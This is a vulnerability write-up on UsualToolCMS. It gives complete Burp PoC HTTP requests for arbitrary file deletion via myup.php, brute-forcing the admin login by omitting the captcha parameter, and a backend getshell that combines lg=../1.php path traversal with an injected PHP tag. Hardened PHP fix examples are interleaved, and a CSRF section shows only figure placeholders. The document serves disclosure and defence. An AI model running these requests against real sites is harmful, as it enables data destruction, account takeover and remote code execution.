0x01 First finding: front-end arbitrary file deletion

Vulnerability details: the last block of the front-end file myup.php allows arbitrary file deletion. Code:

Vulnerable endpoint: http://xxx/myup.php

[Figure 1]

Line 47 only filters "..", so I can still delete any file inside the site; the PoC can be built directly.

[Figure 2]

[Figure 3]

Burp PoC:

[Figure 4]

POST /UsualToolCMS/myup.php HTTP/1.1
Host: 192.168.235.242
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
X-Forwarded-For: 8.8.8.8
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 25

get=delimg&imgurl=./1.php
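For contrast with the "delimg" handler above, here is a hardened version of that handler as an added example (it is not UsualToolCMS code). It replaces the ".." string filter with a realpath() containment check plus an extension allow-list, so a name like ./1.php is refused; UPLOAD_DIR, the allow-list and the session/token names are assumptions.

```php
<?php
// Added example, not UsualToolCMS code: a hardened "delimg" handler. The page
// reports the original only strips ".." from imgurl; "./1.php" contains no ".."
// and still reaches the web root. UPLOAD_DIR, the extension allow-list and the
// session/token names are assumptions for this illustration.

const UPLOAD_DIR = __DIR__ . '/upload';
const DELETABLE_EXT = ['jpg', 'jpeg', 'png', 'gif'];

// Returns the absolute path that may be deleted, or null to refuse. realpath()
// resolves traversal and symlinks on the filesystem instead of by string filtering.
function resolve_deletable_image(string $imgurl): ?string
{
    $base = realpath(UPLOAD_DIR);
    if ($base === false) {
        return null;                                   // upload dir missing
    }
    $name = basename($imgurl);
    if ($name === '' || $name !== $imgurl) {
        return null;                                   // any directory part: refuse
    }
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    if (!in_array($ext, DELETABLE_EXT, true)) {
        return null;                                   // never .php, .htaccess, ...
    }
    $target = realpath($base . DIRECTORY_SEPARATOR . $name);
    if ($target === false || strpos($target, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;                                   // missing, or outside $base
    }
    return is_file($target) ? $target : null;
}

// Deleting is a state change: require a logged-in user and a CSRF token.
if (($_POST['get'] ?? '') === 'delimg') {
    session_start();
    $csrf = (string)($_SESSION['csrf'] ?? '');
    if (empty($_SESSION['uid']) || $csrf === ''
        || !hash_equals($csrf, (string)($_POST['token'] ?? ''))) {
        http_response_code(403);
        exit;
    }
    $path = resolve_deletable_image((string)($_POST['imgurl'] ?? ''));
    if ($path === null || !unlink($path)) {
        http_response_code(400);
        exit;
    }
    echo 'ok';
}
```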

0x02 Bypassing the backend captcha to brute-force the login

Vulnerable endpoint: http://xxx.xxx.xxx.xxx/cmsadmin/ The backend login requires a captcha by default, but when I delete the captcha parameter ucode, the login still succeeds.

1. The login request under default conditions

[Figure 2-1]

[Figure 2-2]

After deleting the ucode parameter and the cookie, the login succeeds straight away.

[Figure 2-3]

Brute-forcing the backend password with Burp

[Figure 2-4]

[Figure 2-5]

POST /UsualToolCMS/cmsadmin/a_login.php?do=login HTTP/1.1
Host: 192.168.235.242
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.235.242/UsualToolCMS/cmsadmin/a_login.php
X-Forwarded-For: 8.8.8.8
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 23

uuser=admin&upass=admin
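As an added example (not UsualToolCMS code), the following shows the captcha-check shape that the bypass above implies next to a hardened one, plus a server-side attempt counter that survives the dropped cookie; the parameter and session names (ucode, uuser) and the limits are assumptions.

```php
<?php
// Added example, not UsualToolCMS code: the captcha-check shape the page
// describes next to a hardened one, plus a server-side attempt counter. The
// parameter/session names (ucode, uuser) and the limits are assumptions.

// Shape A, the bypassable one: the comparison only runs when the client sends
// ucode, so a request without the parameter skips it and reaches the password check.
function captcha_ok_weak(array $post, array $session): bool
{
    if (isset($post['ucode']) && isset($session['ucode'])) {
        return strtolower($post['ucode']) === strtolower($session['ucode']);
    }
    return true;                                    // absent means pass: the bug
}

// Shape B: mandatory, bound to the session, consumed on every attempt (right or
// wrong, so one solved image cannot be replayed) and compared in constant time.
function captcha_ok(array $post, array &$session): bool
{
    $expected = (string)($session['ucode'] ?? '');
    unset($session['ucode']);
    $given = (string)($post['ucode'] ?? '');
    if ($expected === '' || $given === '') {
        return false;                               // nothing to compare: fail closed
    }
    return hash_equals(strtolower($expected), strtolower($given));
}

// The attempt counter must live server-side (database, APCu, Redis), keyed by the
// account and never inside the PHP session: the page shows the cookie can simply be
// dropped, which would reset a per-session counter. $store stands in for that backend.
function login_allowed(array &$store, string $user, int $max = 5, int $window = 900): bool
{
    $rec = $store[$user] ?? ['n' => 0, 't' => time()];
    if (time() - $rec['t'] > $window) {
        $rec = ['n' => 0, 't' => time()];           // window expired: start over
    }
    $store[$user] = $rec;
    return $rec['n'] < $max;
}

function record_failure(array &$store, string $user): void
{
    $store[$user] = $store[$user] ?? ['n' => 0, 't' => time()];
    $store[$user]['n']++;
}

// Usage in an a_login.php-style flow; check the limit and captcha before the
// password lookup, so a failed captcha never reveals whether the account exists:
// if (!login_allowed($store, $user) || !captcha_ok($_POST, $_SESSION)) { deny(); }
```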

0x03 Backend GETSHELL

Vulnerable endpoint: http://xxx.xxx.xxx.xxx/cmsadmin/a_lang.php; line 13 performs no check on $lg

[Figure 3-1]

[Figure 3-2]

[Figure 3-3]

When clicking Save, intercept the request and change the lg parameter in the URL so that the file is written to the web root; then, in the POST parameters, append en"},<?php phpinfo(); ?> after en.

[Figure 3-4]

[Figure 3-5]

[Figure 3-6]

POST /UsualToolCMS/cmsadmin/a_langx.php?x=m&lg=../1.php HTTP/1.1
Host: 192.168.235.242
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.235.242/UsualToolCMS/cmsadmin/a_langx.php?lg=lg-en.json
Cookie: navleft=21; UTCMSLanguage=zh; PHPSESSID=1r5kk3jieflfbnseav3e5dnclo
X-Forwarded-For: 8.8.8.8
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 9189

submit=%E4%BF%9D%E5%AD%98%E8%AF%AD%E8%A8%80%E5%8C%85&keys%5B%5D=language&values%5B%5D=en"},<?php phpinfo(); ?>&keys%5B%5D=charset&values%5B%5D=utf-8&keys%5B%5D=speak&values%5B%5D=English&keys%5B%5D=web&values%5B%5D=UsualToolCMS&key%5B%5D=index&value%5B%5D=Home&key%5B%5D=article&value%5B%5D=Article&key%5B%5D=product&value%5B%5D=Product&key%5B%5D=picture&value%5B%5D=Picture&key%5B%5D=atlas&value%5B%5D=Atlas&key%5B%5D=contact&value%5B%5D=Contact&key%5B%5D=about&value%5B%5D=About&key%5B%5D=forum&value%5B%5D=Forum&key%5B%5D=register&value%5B%5D=Register&key%5B%5D=login&value%5B%5D=Login&key%5B%5D=news&value%5B%5D=News&key%5B%5D=job&value%5B%5D=Job&key%5B%5D=wages&value%5B%5D=Wages&key%5B%5D=application&value%5B%5D=Application&key%5B%5D=resume&value%5B%5D=Resume&key%5B%5D=shopcart&value%5B%5D=Shopcart&key%5B%5D=account&value%5B%5D=Account&key%5B%5D=member&value%5B%5D=Member&key%5B%5D=up&value%5B%5D=Up&key%5B%5D=down&value%5B%5D=Down&key%5B%5D=more&value%5B%5D=More&key%5B%5D=new&value%5B%5D=New&key%5B%5D=authorize&value%5B%5D=Authorize&key%5B%5D=authenticating&value%5B%5D=Authenticating&key%5B%5D=qq&value%5B%5D=QQ&key%5B%5D=membercenter&value%5B%5D=Member&key%5B%5D=username&value%5B%5D=Username&key%5B%5D=password&value%5B%5D=Password&key%5B%5D=forgotpass&value%5B%5D=Forgot&key%5B%5D=search&value%5B%5D=Search&key%5B%5D=detail&value%5B%5D=Detail&key%5B%5D=size&value%5B%5D=Size&key%5B%5D=spec&value%5B%5D=Spec&key%5B%5D=color&value%5B%5D=Color&key%5B%5D=aboutus&value%5B%5D=About+Us&key%5B%5D=newgoods&value%5B%5D=New+Product&key%5B%5D=topgoods&value%5B%5D=Top+Product&key%5B%5D=link&value%5B%5D=Link&key%5B%5D=confirm&value%5B%5D=Confirm&key%5B%5D=email&value%5B%5D=Email&key%5B%5D=title&value%5B%5D=Title&key%5B%5D=content&value%5B%5D=Content&key%5B%5D=avatar&value%5B%5D=Avatar&key%5B%5D=sex&value%5B%5D=Sex&key%5B%5D=man&value%5B%5D=Man&key%5B%5D=woman&value%5B%5D=Woman&key%5B%5D=address&value%5B%5D=ADD.&key%5B%5D=tel&value%5B%5D=Tel&key%5B%5D=fax&value%5B%5D=Fax&key%5B%5D=introdu
ction&value%5B%5D=Intro&key%5B%5D=validatecode&value%5B%5D=Captcha&key%5B%5D=changeit&value%5B%5D=Change+it&key%5B%5D=order&value%5B%5D=Order&key%5B%5D=writeorder&value%5B%5D=Write+Order&key%5B%5D=menu&value%5B%5D=Menu&key%5B%5D=balance&value%5B%5D=Balance&key%5B%5D=level&value%5B%5D=Level&key%5B%5D=writearticles&value%5B%5D=Write+Articles&key%5B%5D=articlemanagement&value%5B%5D=Article+Admin&key%5B%5D=articlebrowse&value%5B%5D=Article+Browse&key%5B%5D=writeonline&value%5B%5D=Add+New&key%5B%5D=payment&value%5B%5D=Payment&key%5B%5D=registrationtime&value%5B%5D=Reg+Time&key%5B%5D=lastlogintime&value%5B%5D=Last+Login&key%5B%5D=fullname&value%5B%5D=Full+Name&key%5B%5D=privileges%3Adiscount&value%5B%5D=Privileges%3ADiscount&key%5B%5D=state&value%5B%5D=State&key%5B%5D=source&value%5B%5D=Source&key%5B%5D=ordernumber&value%5B%5D=Order+No.&key%5B%5D=money&value%5B%5D=Money&key%5B%5D=time&value%5B%5D=Time&key%5B%5D=finish&value%5B%5D=Finish&key%5B%5D=unpaid&value%5B%5D=Unpaid&key%5B%5D=deliver&value%5B%5D=Deliver&key%5B%5D=refund&value%5B%5D=Refund&key%5B%5D=goods&value%5B%5D=Goods&key%5B%5D=charge&value%5B%5D=Charge&key%5B%5D=other&value%5B%5D=Other&key%5B%5D=ordertime&value%5B%5D=Order+Time&key%5B%5D=voucher&value%5B%5D=Voucher&key%5B%5D=customer&value%5B%5D=Customer&key%5B%5D=zipcode&value%5B%5D=Zip+Code&key%5B%5D=logistics&value%5B%5D=Logistics&key%5B%5D=logisticscompany&value%5B%5D=Company&key%5B%5D=logisticsnumber&value%5B%5D=Number&key%5B%5D=logisticsdetails&value%5B%5D=Details&key%5B%5D=paymentmethod&value%5B%5D=Method&key%5B%5D=alipay&value%5B%5D=Alipay&key%5B%5D=wechatpay&value%5B%5D=Tencent+Wechat&key%5B%5D=paypal&value%5B%5D=Paypal&key%5B%5D=waitinganswer&value%5B%5D=Waiting&key%5B%5D=answered&value%5B%5D=Answered&key%5B%5D=question&value%5B%5D=Question&key%5B%5D=reply&value%5B%5D=Reply&key%5B%5D=tencentaccount&value%5B%5D=Tencent&key%5B%5D=weiboaccount&value%5B%5D=Weibo&key%5B%5D=wechataccount&value%5B%5D=Wechat&key%5B%5D=binded&value%5B%5D=Binded&key%5B%5D=untie
&value%5B%5D=Untie&key%5B%5D=quantity&value%5B%5D=Qty&key%5B%5D=parameter&value%5B%5D=Parm&key%5B%5D=total&value%5B%5D=Total&key%5B%5D=submit&value%5B%5D=Submit&key%5B%5D=delete&value%5B%5D=Del&key%5B%5D=unit&value%5B%5D=USD&key%5B%5D=actual&value%5B%5D=Actual&key%5B%5D=feedback&value%5B%5D=Feedback&key%5B%5D=otheraccount&value%5B%5D=Other+Accounts&key%5B%5D=out&value%5B%5D=Out&key%5B%5D=ranking&value%5B%5D=Ranking&key%5B%5D=recommend&value%5B%5D=Recommend&key%5B%5D=tag&value%5B%5D=Tag&key%5B%5D=tags&value%5B%5D=Tags&key%5B%5D=read&value%5B%5D=Read&key%5B%5D=productdetails&value%5B%5D=Product+Details&key%5B%5D=service&value%5B%5D=Service&key%5B%5D=category&value%5B%5D=Category&key%5B%5D=allcategory&value%5B%5D=All+Category&key%5B%5D=stock&value%5B%5D=Stock&key%5B%5D=price&value%5B%5D=Price&key%5B%5D=sale&value%5B%5D=Sale&key%5B%5D=loginview&value%5B%5D=Login+View&key%5B%5D=readme&value%5B%5D=Read+Me&key%5B%5D=popularity&value%5B%5D=Popularity&key%5B%5D=details&value%5B%5D=Details&key%5B%5D=message&value%5B%5D=Message&key%5B%5D=original&value%5B%5D=Original&key%5B%5D=author&value%5B%5D=Author&key%5B%5D=pass&value%5B%5D=Pass&key%5B%5D=audit&value%5B%5D=Audit&key%5B%5D=return&value%5B%5D=Return&key%5B%5D=yes&value%5B%5D=Yes&key%5B%5D=no&value%5B%5D=No&key%5B%5D=modify&value%5B%5D=Modify&key%5B%5D=articlemodify&value%5B%5D=Article+Modify&key%5B%5D=type&value%5B%5D=Type&key%5B%5D=moreupload&value%5B%5D=Up+to+upload&key%5B%5D=success&value%5B%5D=Success&key%5B%5D=fail&value%5B%5D=Fail&key%5B%5D=upload&value%5B%5D=Upload&key%5B%5D=uploadtime&value%5B%5D=Upload+Time&key%5B%5D=contactus&value%5B%5D=Contact+Us&key%5B%5D=previouspage&value%5B%5D=Prev&key%5B%5D=nextpage&value%5B%5D=Next&key%5B%5D=firstpage&value%5B%5D=First&key%5B%5D=lastpage&value%5B%5D=Last&key%5B%5D=totalpage&value%5B%5D=Total&key%5B%5D=currentpage&value%5B%5D=Current&key%5B%5D=buy&value%5B%5D=Buy&key%5B%5D=mailverify&value%5B%5D=Email+validation&key%5B%5D=welcome&value%5B%5D=Welcome&key%5B%5D=close&value%5B
%5D=closed&key%5B%5D=findpassword&value%5B%5D=Find+Password&key%5B%5D=contactmanager&value%5B%5D=Contact+Manager&key%5B%5D=orderdetaillogin&value%5B%5D=For+order+details%2Cplease+visit+the+website.&key%5B%5D=enterusername&value%5B%5D=Please+enter+username%21&key%5B%5D=enterpassword&value%5B%5D=Please+enter+password%21&key%5B%5D=enteremail&value%5B%5D=Please+enter+Email%21&key%5B%5D=emailerr&value%5B%5D=Email+error%21&key%5B%5D=entertitle&value%5B%5D=Please+enter+title%21&key%5B%5D=entercontent&value%5B%5D=Please+enter+content%21&key%5B%5D=selecttype&value%5B%5D=Type+must+be+selected%21&key%5B%5D=enterauthor&value%5B%5D=Please+enter+author%21&key%5B%5D=enterpasswords&value%5B%5D=Please+confirm+the+password%21&key%5B%5D=passworderr&value%5B%5D=The+codes+don&key%5B%5D=entercaptcha&value%5B%5D=Please+enter+captcha%21&key%5B%5D=captchaerr&value%5B%5D=Captcha+error%21&key%5B%5D=mailsenderr&value%5B%5D=Mail+not+sent%21&key%5B%5D=mailok&value%5B%5D=Please+check+email%21&key%5B%5D=pleasemailverify&value%5B%5D=Please+check+email+for+verification%21&key%5B%5D=mailverifycode&value%5B%5D=Email+Authentication+Code&key%5B%5D=mailcopylink&value%5B%5D=Please+copy+the+following+link&key%5B%5D=totalnum&value%5B%5D=Total+Num&key%5B%5D=updateok&value%5B%5D=Update+successed%21&key%5B%5D=updateno&value%5B%5D=Failed+to+update%21&key%5B%5D=payok&value%5B%5D=Successful+payment%21&key%5B%5D=payno&value%5B%5D=Payment+Failed%21&key%5B%5D=createempty&value%5B%5D=Required+field+is+empty%21&key%5B%5D=createok&value%5B%5D=Create+successed%21&key%5B%5D=createno&value%5B%5D=Failed+to+create%21&key%5B%5D=gotopay&value%5B%5D=Go+to+pay%21&key%5B%5D=untieok&value%5B%5D=Untie+successed%21&key%5B%5D=untieno&value%5B%5D=Untie+failed%21&key%5B%5D=delok&value%5B%5D=Delete+successed%21&key%5B%5D=delno&value%5B%5D=Delete+failed%21&key%5B%5D=regclose&value%5B%5D=Website+registration+closed%21&key%5B%5D=regmailerr&value%5B%5D=Account+or+email+registered%21&key%5B%5D=loginusererr&value%5B%5D=Account+does+not+exist
%21&key%5B%5D=loginpasserr&value%5B%5D=Account+or+password+does+not+match%21&key%5B%5D=administratorreply&value%5B%5D=The+administrator+has+not+responded%2C+please+wait+patiently.&key%5B%5D=noscript&value%5B%5D=Sorry%2C+your+browser+disabled+JavaScript%2C+it+may+not+be+able+to+use+some+of+the+site&key%5B%5D=readmecontent&value%5B%5D=We+guarantee+that+the+outer+packing+of+the+goods+is+in+good+condition+at+the+time+of+shipment.+When+you+receive+the+goods%2C+please+carefully+check+whether+the+invoice+and+the+goods+are+consistent+with+the+delivery+order.+If+you+find+that+the+goods+are+missing+or+damaged%2C+please+contact+our+customer+service+department+on+the+spot+when+the+delivery+personnel+are+still+on+the+scene%3B+If+you+find+that+the+package+is+damaged+or+the+goods+are+damaged+in+transit%2C+please+point+out+and+refuse+to+accept+it+on+the+spot.+After+refusal%2C+please+call+our+customer+service.+If+you+have+signed+for+it+or+someone+else+has+signed+for+it%2C+you+will+be+considered+as+the+packaging%2C+quantity+and+content+of+the+goods.+I+will+not+be+able+to+accept.&key%5B%5D=copyright&value%5B%5D=Copyright&key%5B%5D=cssdisplay&value%5B%5D=none&key%5B%5D=test&value%5B%5D=Test
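A hardened save routine for the language-pack editor described above, added here as an example (it is not UsualToolCMS code). It closes both gaps the request shows: the lg name is validated against a fixed pattern instead of being used as a path, and the pack is produced by json_encode() so a value cannot close the JSON object or leave PHP tags in the file; LANG_DIR and the key pattern are assumptions.

```php
<?php
// Added example, not UsualToolCMS code: a hardened save routine for the language
// pack editor. The page reports two gaps: the lg name is used as-is (so ../1.php
// lands in the web root), and values are spliced into the file as text, so
// en"},<?php phpinfo(); ?> closes the object and leaves PHP in the file.

const LANG_DIR = __DIR__ . '/lang';      // assumption for this illustration

// Only lg-xx.json, lower-case two-letter code: no separators, no other extension.
function valid_lang_name(string $lg): bool
{
    return (bool)preg_match('/^lg-[a-z]{2}\.json$/', $lg);
}

// Build the pack with json_encode() so every value is serialised as a JSON string.
// JSON_HEX_TAG turns < and > into \u003C / \u003E, so the stored file never even
// contains a literal "<?php"; json_decode() still returns the original text.
function build_lang_pack(array $keys, array $values): ?string
{
    if (count($keys) !== count($values)) {
        return null;
    }
    $pack = [];
    $vals = array_values($values);
    foreach (array_values($keys) as $i => $k) {
        if (!is_string($k) || !is_string($vals[$i])
            || !preg_match('/^[a-z0-9_:]{1,64}$/i', $k)) {
            return null;                              // reject odd keys/values
        }
        $pack[$k] = $vals[$i];                        // value is data, never code
    }
    $json = json_encode($pack, JSON_PRETTY_PRINT | JSON_UNESCAPED_UNICODE | JSON_HEX_TAG);
    return $json === false ? null : $json;            // e.g. invalid UTF-8
}

function save_lang_pack(string $lg, array $keys, array $values): bool
{
    if (!valid_lang_name($lg)) {
        return false;
    }
    $json = build_lang_pack($keys, $values);
    $dir = realpath(LANG_DIR);
    if ($json === null || $dir === false) {
        return false;
    }
    return file_put_contents($dir . DIRECTORY_SEPARATOR . $lg, $json, LOCK_EX) !== false;
}

// Request wiring (the page shows keys[]/values[] pairs arriving via POST):
// save_lang_pack((string)($_GET['lg'] ?? ''), $_POST['keys'] ?? [], $_POST['values'] ?? []);
```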

## CSRF combined with the backend getshell above

[Figure 4-1]

[Figure 4-2]